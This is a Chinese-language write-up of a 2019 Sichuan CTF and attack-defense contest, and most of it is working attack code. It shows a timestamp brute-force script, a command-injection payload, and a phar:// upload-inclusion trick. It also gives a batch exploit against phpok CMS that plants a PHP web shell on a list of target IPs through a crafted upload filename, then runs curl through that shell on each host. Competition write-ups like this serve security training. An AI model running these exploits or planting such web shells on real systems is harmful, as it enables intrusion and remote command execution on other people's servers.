2019年四川省四叶草安全比赛

凭自己的零散记录写下吧,具体的再安排时间复盘,结果不理想,防御还存在很大问题

1..ctf:第一天30道题,6道web,4道具体考点,当时解决

弱密码登陆+flag(还有slq注入,但是当时无法dump数据)

脚本爆破

命令执行

phar文件包含+上传

2.awd:jsp+php+python,jsp日志审了几个shell,php直接可以上脚本打,python暂时还未有思路

一.ctf

2.脚本

查看php文件,只需输入的pwd等于即将到来的time即可

范围根据脚本的运行的具体时间修改即可,多运行几次,由于时间的先后会出现一定的错误

<?php
session_start();
$_SESSION['pwd']=time();
foreach(array_keys($_REQUEST) as $v){
        $key = $v;
        $$key = $_REQUEST[$v];
    }
if (isset ($_POST['password'])) {
    if ($_SESSION['pwd'] == $pwd)
        die('Flag:'.$flag);
    else{
        print '<p>猜测错误.</p>';
        $_SESSION['pwd']=time().time();
    }
}
#coding=utf-8
"""
author:图先生
简介:http://www.youknowi.xin/
time:2019/7/20 12:53
filename:CTF6.py
"""
import requests

url="http://192.200.1.49/admin/checklogin.php"
#url="http://192.168.159.133:9096/csp/2.php"
#data={"password":"1","pwd":{}}
for i in range(1563599000,1563599915):
temp_pwd=i
data = {"password": "1", "pwd": temp_pwd}
s=requests.post(url=url,data=data)
if "Flag" in s.text:
print(s.text)

3.命令执行

典型的题目

127.0.0.1%0ased%091,10%09flag(%0a分割,%09空格,sed是因为cat,tail,head,more,less,strings都没有)

4.

phar协议进行上传包含(主要因为上传限制后缀,包含又跟了.php后缀)

<?php
$file = $_REQUEST['file'];
if ($file != '') {
$inc = sprintf("%s.php", $file); // only php file can be included
include($inc);
}
?>

shell.php打包为压缩文件1.zip,再修改为jpg,txt后缀,最后包含?file=phar://1.zip#shell即可

二.awd

1.jsp

jeecms的ssrf与rce

ssrf当时复现成功,rec没有复现成功(其他人应该直接用rce打的)

2.php

phpok cms

参考:https://balis0ng.com/post/dai-ma-shen-ji/phpok-4.7cong-zhu-ru-dao-getshell

上传shell.php

#coding=utf-8
"""
https://balis0ng.com/post/dai-ma-shen-ji/phpok-4.7cong-zhu-ru-dao-getshell
author:图先生
简介:http://www.youknowi.xin/
time:2019/7/21 11:24
filename:cmd.py
"""
import sys
import re
import requests
import time
f=open("ip.txt")
urls=[]
for i in f.readlines():
    i=i.rstrip("\n")
    if i:
        #print(i)
        urls.append(i)
    #time.sleep(420)
if 1:
    for url in urls:
        try:
            base_url = "http://" + url
            baseurl = base_url
            phpses = ''
            cookies = {'PHPSESSION': phpses}
            if baseurl[-1] == '/':
                baseurl = baseurl[:-1]
            url = baseurl + '/index.php?c=upload&f=save'
            # <?php @eval($_POST[balisong]);phpinfo();?>
            # <?php @system($_GET["cmd123"]); phpinfo();?>
            files = [
                ('upfile', (
                    "1','r7ip15ijku7jeu1s1qqnvo9gj0','30',''),('1',0x7265732f3230313730352f32332f,0x393936396465336566326137643432352e6a7067,'',0x7265732f62616c69736f6e672e706870,'1495536080','2.jpg",
                    '<?php @system($_GET["cmd123"]); phpinfo();?>', 'image/jpg')),
            ]
            files1 = [
                ('upfile',
                 ('1.jpg', '<?php @system($_GET["cmd123"]); phpinfo();?>', 'image/jpg')),
            ]
            r = requests.post(url, files=files, cookies=cookies)
            response = r.text
            id = re.search('"id":"(\d+)"', response, re.S).group(1)
            id = int(id) + 1
            url = baseurl + '/index.php?c=upload&f=replace&oldid=%d' % (id)
            r = requests.post(url, files=files1, cookies=cookies)
            shell = baseurl + '/res/balisong.php'
            response = requests.get(shell)
            if response.status_code == 200:
                print (shell)
            else:
                print ("oh!Maybe failed.Please check")
        except Exception as e:
            pass

getflag.py

#coding=utf-8
"""
author:图先生
简介:http://www.youknowi.xin/
time:2019/7/21 11:24
filename:cmd.py
"""
import sys
import re
import requests
f=open("ip.txt")
urls=[]
for i in f.readlines():
i=i.rstrip("\n")
if i:
#print(i)
urls.append(i)
print(urls)
for url in urls:
#<?php @eval($_POST[balisong]);phpinfo();?>
base_url="http://"+url+"/res/balisong.php?cmd123=curl http://192.200.0.70/remoteflag/"
print(base_url)
#data={"balisong":"curl http://192.200.0.70/remoteflag/"}
try:
s=requests.get(base_url)
if(s.status_code==200):
print(s.text)
except Exception as e:
pass

3.python

之前没有审过python相关的,暂放,这次的题目github diango_blog即可

2019.7.21

标签: